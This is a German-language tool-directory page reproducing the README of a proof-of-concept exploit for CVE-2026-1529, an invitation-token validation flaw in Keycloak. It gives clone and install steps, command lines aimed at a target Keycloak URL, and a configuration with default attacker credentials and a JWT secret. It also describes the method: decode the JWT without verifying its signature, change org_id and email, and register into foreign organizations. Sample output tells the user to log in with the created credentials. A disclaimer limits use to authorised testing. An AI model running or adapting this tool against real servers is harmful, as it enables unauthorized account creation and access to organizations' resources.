Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubninjazan420/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Repository anzeigen
110vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2026-1529 (PoC) ist eine kritische Schwachstelle in Keycloak, die eine unbefugte Registrierung in Organisationen durch fehlerhafte Validierung von Einladungstokens ermöglicht. Dieses Exploit-Tool demonstriert die Schwachstelle, indem es JWT-Tokens manipuliert, um Benutzer in unbefugten Organisationen zu registrieren.

Teilen

CVE-2026-1529 Keycloak-Exploit-Tool

Keycloak: Nicht autorisierte Organisationsregistrierung durch unsachgemäße Validierung von Einladungstokens


Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und Sicherheitstestzwecken. Verwenden Sie es nur auf Systemen, für die Sie ausdrücklich eine Testberechtigung haben. Unbefugter Zugriff auf Computersysteme ist illegal und unethisch. Die Autoren dieses Tools sind nicht verantwortlich für Missbrauch oder Schäden, die durch diese Software verursacht werden.

Erstellt von: f3ds cr3w est, 2002


Überblick

CVE-2026-1529 ist eine kritische Schwachstelle in Keycloak, die eine nicht autorisierte Organisationsregistrierung durch unsachgemäße Validierung von Einladungstokens ermöglicht. Dieses Exploit-Tool demonstriert die Schwachstelle, indem es JWT-Tokens manipuliert, um Benutzer in nicht autorisierten Organisationen zu registrieren.

Technische Details

  • CVE-ID: CVE-2026-1529
  • Betroffene Software: Keycloak (org.keycloak.services.resources.organizations)
  • CVSS-Score: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Angriffsvektor: Netzwerk
  • Angriffskomplexität: Niedrig
  • Auswirkung: Nicht autorisierter Zugriff auf Organisationsressourcen

Beschreibung der Schwachstelle

Die Schwachstelle besteht im JWT-Token-Validierungsprozess für Organisationseinladungen. Angreifer können die Felder org_id und email in den JWT-Nutzdaten manipulieren, wodurch sie Benutzer ohne ordnungsgemäße Autorisierung in beliebigen Organisationen registrieren können.


Installation

Voraussetzungen

  • Python 3.7 oder höher
  • pip-Paketmanager

Einrichtung

  1. Klonen oder laden Sie das Exploit-Tool herunter:
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Installieren Sie die erforderlichen Abhängigkeiten:
pip install -r requirements.txt
  1. Machen Sie das Exploit-Skript ausführbar:
chmod +x keycloak-exploit.py

Verwendung

Grundlegende Verwendung

# Standard usage with target URL
python keycloak-exploit.py https://target-keycloak.com

# Show help
python keycloak-exploit.py -h

# Show version
python keycloak-exploit.py -v

Erweiterte Verwendung

# Use custom invitation token
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Use custom organization ID
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Use custom configuration file
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Enable debug logging
python keycloak-exploit.py -d https://target-keycloak.com

Befehlszeilenoptionen

OptionBeschreibungErforderlich
targetZiel-Keycloak-URL (IP oder Domäne)Ja
-t, --tokenBenutzerdefiniertes Einladungstoken zur VerwendungNein
-o, --org-idBenutzerdefinierte Organisations-IDNein
-c, --configPfad zur KonfigurationsdateiNein
-d, --debugDebug-Protokollierung aktivierenNein
-v, --versionVersionsinformationen anzeigenNein
-h, --helpHilfemeldung anzeigenNein

Ausgabe

Erfolgreicher Exploit

Wenn der Exploit erfolgreich ist, sehen Sie eine Ausgabe wie diese:

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Fehlgeschlagener Exploit

Wenn der Exploit fehlschlägt, sehen Sie:

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Projektstruktur

CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

Konfiguration

Standardkonfiguration

Das Tool verwendet eine Standardkonfigurationsdatei (config/default_config.json) mit den folgenden Einstellungen:

{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Benutzerdefinierte Konfiguration

Sie können eine benutzerdefinierte Konfigurationsdatei erstellen und sie mit der Option -c verwenden:

{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Technische Details

Exploit-Prozess

  1. Zielanalyse: Prüfen, ob das Ziel eine verwundbare Keycloak-Instanz ist
  2. Token-Generierung: Ein benutzerdefiniertes Einladungstoken generieren oder verwenden
  3. Token-Manipulation: Die JWT-Nutzdaten manipulieren, um die Organisations-ID zu ändern
  4. Benutzerregistrierung: Einen Benutzer mit dem manipulierten Token registrieren
  5. Login-Test: Überprüfen, ob sich der erstellte Benutzer anmelden kann
  6. Berichtserstellung: Einen detaillierten Exploit-Bericht erstellen

JWT-Manipulation

Das Tool nutzt die unsachgemäße JWT-Validierung aus, indem es:

  1. Das JWT-Token ohne Signaturprüfung dekodiert
  2. Das Feld org_id ändert, um eine andere Organisation anzuvisieren
  3. Bei Bedarf das Feld email ändert
  4. Das Token mit den manipulierten Nutzdaten neu kodiert

Sicherheitshinweise

  • Das Tool verwendet eine ordnungsgemäße Fehlerbehandlung und Protokollierung
  • Alle Netzwerkanfragen enthalten geeignete Header
  • Alle Benutzereingaben werden einer Eingabevalidierung unterzogen
  • Das Tool respektiert die Serverantwortcodes des Ziels

Fehlerbehebung

Häufige Probleme

  1. Verbindungsfehler

    • Überprüfen, ob die Ziel-URL erreichbar ist
    • Verifizieren, dass das Ziel eine Keycloak-Instanz ist
    • Netzwerkverbindung und Firewall-Einstellungen prüfen
  2. Token-Validierungsfehler

    • Sicherstellen, dass das Tokenformat korrekt ist
    • Prüfen, ob das Token die erforderlichen Felder enthält (org_id, email, invitation_type)
    • Verifizieren, dass das Token nicht abgelaufen ist
Tool herunterladen